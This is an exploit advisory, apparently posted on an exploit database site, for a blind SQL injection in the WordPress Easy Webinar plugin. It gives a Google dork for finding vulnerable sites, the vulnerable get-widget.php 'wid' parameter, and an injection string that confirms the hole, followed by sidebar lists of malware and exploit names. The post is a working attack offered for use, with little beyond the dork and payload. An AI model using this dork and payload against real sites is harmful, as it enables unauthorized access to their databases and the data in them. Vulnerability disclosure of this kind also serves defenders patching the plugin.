WordPress Easy Webinar Blind SQL Injection

Posted on 27 October 2012

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper [at] areyousecure.net) # Tested on: [Linux/Windows 7] #Vulnerable Parameters: wid= # Google Dork: allinurl: get-widget.php?wid= ############################################################## Exploit: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi] Note: The HTTP response will read 404, but this is false: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x This will result in the page loading correctly and show that the plugin is vulnerable to injection (string). ############################################################## www.areyousecure.net # Shouts to the Belegit crew

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SimpCMS 0.1 Cross Site Scripting
Poultry Farm Management System 1.0 Shell Upload
Automad 2.0.0-alpha.4 Cross Site Scripting
SolarWinds Platform 2024.1 SR1 Race Condition
Faronics WINSelect Hardcoded Credentials / Bad Permissions / Unhashed Password

Last 20